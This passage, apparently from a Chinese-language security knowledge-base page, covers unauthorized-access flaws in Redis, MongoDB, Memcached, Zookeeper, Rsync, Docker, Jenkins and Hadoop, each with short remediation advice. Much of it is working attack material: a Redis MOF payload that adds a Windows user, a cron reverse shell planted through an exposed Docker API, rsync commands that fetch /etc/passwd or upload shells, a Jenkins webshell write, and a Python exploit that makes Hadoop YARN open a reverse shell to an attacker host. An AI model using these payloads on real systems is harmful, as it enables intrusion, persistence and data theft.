Name <span class="token operator">=</span> <span class="token string">&quot;consPCSV2&quot;</span><span class="token punctuation">;</span>
ScriptingEngine <span class="token operator">=</span> <span class="token string">&quot;JScript&quot;</span><span class="token punctuation">;</span>
ScriptText <span class="token operator">=</span>
<span class="token string">&quot;var WSH = new ActiveXObject(&quot;</span>WScript.Shell<span class="token string">&quot;)nWSH.run(&quot;</span>net.exe user wintrysec admin666 /add<span class="token string">&quot;)&quot;</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
instance of __FilterToConsumerBinding
<span class="token punctuation">{</span>
Consumer <span class="token operator">=</span> <span class="token variable">$Consumer</span><span class="token punctuation">;</span>
Filter <span class="token operator">=</span> <span class="token variable">$EventFilter</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br></div></div><p>然后执行</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token punctuation">(</span>echo -e <span class="token string">&quot;nn&quot;</span><span class="token punctuation">;</span> <span class="token function">cat</span> mof.txt<span class="token punctuation">;</span> <span class="token builtin class-name">echo</span> -e <span class="token string">&quot;nn&quot;</span><span class="token punctuation">)</span> <span class="token operator">&gt;</span> foo.txt
<span class="token function">cat</span> foo.txt <span class="token operator">|</span> redis-cli -h <span class="token number">192.168</span>.1.10 -x <span class="token builtin class-name">set</span> mof
redis-cli -h <span class="token number">192.168</span>.1.10
config <span class="token builtin class-name">set</span> <span class="token function">dir</span> c:/windows/system32/wbem/mof/
config <span class="token builtin class-name">set</span> dbfilename wintrysec.mof
save
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><h3 id="修复建议">修复建议 <a href="#修复建议" class="header-anchor">#</a></h3> <blockquote><ul><li>使用强密码认证</li> <li>降权运行 <code>g roupadd -r redis &amp;&amp; useradd -r -g redis redis</code>，用低权限账户</li> <li>限制<code>ip</code>禁止外网访问/修改默认端口   ( <code>redis.conf</code> )</li> <li><code>Redis</code>默认不生成日志，可以自己<a href="https://www.freebuf.com/column/158065.html" target="_blank" rel="noopener noreferrer">配置<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></li></ul></blockquote> <p><strong>设置防火墙策略</strong></p> <p>如果正常业务中<code>Redis</code>服务需要被其他服务器来访问，可以设置<code>iptables</code>策略仅允许指定的<code>IP</code>来访问<code>Redis</code>服务</p> <p><strong>保证 authorized_keys 文件的安全</strong></p> <p>为了保证安全，应该阻止其他用户添加新的公钥。</p> <p>将 authorized_keys 的权限设置为对拥有者只读，其他用户没有任何权限 ：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">chmod</span> <span class="token number">400</span> ~/.ssh/authorized_keys
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>为保证 authorized_keys 的权限不会被改掉，还需要设置该文件的 immutable 位权限</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>chattr +i ~/.ssh/authorized_keys
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>但是，用户还可以重命名 ~/.ssh，然后新建新的 ~/.ssh 目录和 authorized_keys 文件。</p> <p>要避免这种情况，需要设置 ~./ssh 的 immutable 权限</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>chattr +i ~/.ssh
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="mongodb-未授权访问">MongoDB 未授权访问 <a href="#mongodb-未授权访问" class="header-anchor">#</a></h2> <p>MongoDB 默认是没有权限验证的，登录的用户可以通过默认端口无需密码对数据库任意操作(增删改高危动作)，而且可以远程访问数据库</p> <p>1、验证</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>telnet 目标IP <span class="token number">27017</span>
Navicat直接连接
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>2、修复建议</p> <ul><li>添加认证</li></ul> <h2 id="memcached-未授权访问">Memcached 未授权访问 <a href="#memcached-未授权访问" class="header-anchor">#</a></h2> <blockquote><p>Memcached 分布式缓存系统，默认的 11211 端口不需要密码即可访问，攻击者直接访问即可获取数据库中所有信息，造成严重的信息泄露</p></blockquote> <p>1、验证</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>telnet 目标IP <span class="token number">11211</span>

stats
<span class="token comment">#查看memcache服务状态</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>2、修复建议</p> <ul><li>绑定的ip地址为 127.0.0.1限制为内网访问</li> <li>或者通过firewall限制访问</li></ul> <h2 id="zookeeper未授权访问">Zookeeper未授权访问 <a href="#zookeeper未授权访问" class="header-anchor">#</a></h2> <p>ZooKeeper默认开启在2181端口，在未进行任何访问控制情况下，攻击者可通过执行envi命令获得系统大量的敏感信息，包括系统名称、Java环境</p> <p>1、验证</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">echo</span> envi<span class="token operator">|</span><span class="token function">nc</span> 目标IP <span class="token number">2181</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>2、防护建议</p> <ul><li>添加认证</li> <li>限制内网访问</li></ul> <h2 id="rsync-未授权访问漏洞">Rsync 未授权访问漏洞 <a href="#rsync-未授权访问漏洞" class="header-anchor">#</a></h2> <p>Rsync（remote synchronize）是一个远程数据同步工具，可通过 LAN/WAN 快速同步多台主机间的文件，也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问，默认端口837。</p> <p>1、漏洞利用</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#列举整个同步目录或指定目录：</span>
<span class="token function">rsync</span> rsync://172.16.2.250:873/src

<span class="token comment">#下载文件或目录到本地：</span>
<span class="token function">rsync</span> rsync://172.16.2.250:873/src/etc/passwd ./

<span class="token comment">#上传本地文件到服务端：</span>
<span class="token function">rsync</span> -av <span class="token function">nc</span> rsync://172.16.2.250:873/src/etc/cron.hourly

<span class="token comment">#上传的文件可以直接是webshell或crontab反弹shell</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>2、修复建议</p> <ul><li>添加认证</li> <li>限制IP访问</li></ul> <h2 id="docker未授权访问">Docker未授权访问 <a href="#docker未授权访问" class="header-anchor">#</a></h2> <blockquote><p>docker remote api可以执行docker命令，docker守护进程监听在0.0.0.0，可直接调用API来操作docker</p></blockquote> <p>1、验证</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>docker -H tcp://10.1.1.211:2375 version

<span class="token comment">#列出容器信息</span>
<span class="token function">curl</span> http://<span class="token operator">&lt;</span>target<span class="token operator">&gt;</span>:2375/containers/json
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>2、漏洞利用，反弹宿主机shell</p> <p>新运行一个容器，挂载点设置为服务器的根目录挂载至/mnt目录下。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> docker -H tcp://10.1.1.211:2375 run -it -v /:/mnt nginx:latest /bin/bash
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在容器内执行命令，将反弹shell的脚本写入到/var/spool/cron/root</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">echo</span> <span class="token string">'* * * * * /bin/bash -i &gt;&amp; /dev/tcp/10.1.1.214/1234 0&gt;&amp;1'</span> <span class="token operator">&gt;&gt;</span> /mnt/var/spool/cron/crontabs/root
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>本地监听端口，获取宿主机shell</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>nc -lvp 1234
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、修复建议</p> <ul><li>对2375端口做访问控制</li></ul> <h2 id="jenkins未授权访问">Jenkins未授权访问 <a href="#jenkins未授权访问" class="header-anchor">#</a></h2> <p>1、访问<code>http://www.xxx.com:8080/manage</code></p> <p>2、点击脚本命令行</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>println <span class="token string">&quot;whoami&quot;</span>.execute<span class="token punctuation">(</span><span class="token punctuation">)</span>.text
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、漏洞利用，写入webshell</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>new File <span class="token punctuation">(</span><span class="token string">&quot;/var/www/html/shell.php&quot;</span><span class="token punctuation">)</span>.write<span class="token punctuation">(</span><span class="token string">'&lt;?php phpinfo(); ?&gt;'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>4、修复建议</p> <ul><li>升级版本</li> <li>添加认证、设置强密码复杂度及账号锁定</li> <li>避免把Jenkins直接暴露在公网</li></ul> <h2 id="hadoop-未授权访问">Hadoop 未授权访问 <a href="#hadoop-未授权访问" class="header-anchor">#</a></h2> <p>Hadoop是一个由Apache基金会所开发的分布式系统基础架构，由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览、命令执行等操作，危害极大</p> <p>1、验证</p> <p>访问 <code>http://192.168.18.129:8088/cluster</code></p> <p>2、通过REST API命令执行</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>在本地监听端口 <span class="token operator">&gt;&gt;</span> 创建Application <span class="token operator">&gt;&gt;</span> 调用Submit Application API提交

<span class="token comment">#本地监听9999端口</span>
<span class="token function">nc</span> -lvp <span class="token number">9999</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>3、EXP</p> <div class="language-python line-numbers-mode"><pre class="language-python"><code><span class="token comment">#!/usr/bin/env python</span>

<span class="token keyword">import</span> requests

target <span class="token operator">=</span> <span class="token string">'http://192.168.18.129:8088/'</span>
lhost <span class="token operator">=</span> <span class="token string">'192.168.18.138'</span> <span class="token comment"># put your local host ip here, and listen at port 9999</span>

url <span class="token operator">=</span> target <span class="token operator">+</span> <span class="token string">'ws/v1/cluster/apps/new-application'</span>
resp <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">)</span>
app_id <span class="token operator">=</span> resp<span class="token punctuation">.</span>json<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">'application-id'</span><span class="token punctuation">]</span>
url <span class="token operator">=</span> target <span class="token operator">+</span> <span class="token string">'ws/v1/cluster/apps'</span>
data <span class="token operator">=</span> <span class="token punctuation">{</span>
    <span class="token string">'application-id'</span><span class="token punctuation">:</span> app_id<span class="token punctuation">,</span>
    <span class="token string">'application-name'</span><span class="token punctuation">:</span> <span class="token string">'get-shell'</span><span class="token punctuation">,</span>
    <span class="token string">'am-container-spec'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
        <span class="token string">'commands'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
            <span class="token string">'command'</span><span class="token punctuation">:</span> <span class="token string">'/bin/bash -i &gt;&amp; /dev/tcp/%s/9999 0&gt;&amp;1'</span> <span class="token operator">%</span> lhost<span class="token punctuation">,</span>
        <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token string">'application-type'</span><span class="token punctuation">:</span> <span class="token string">'YARN'</span><span class="token punctuation">,</span>
<span class="token punctuation">}</span>
requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span> json<span class="token operator">=</span>data<span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br></div></div></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/web/" class="prev router-link-active"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        分类简介
      </a></span> <span class="next"><a href="/knowledge/web/infoleak.html">
        信息泄露漏洞
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/81.1160b022.js" defer></script>
  </body>
</html>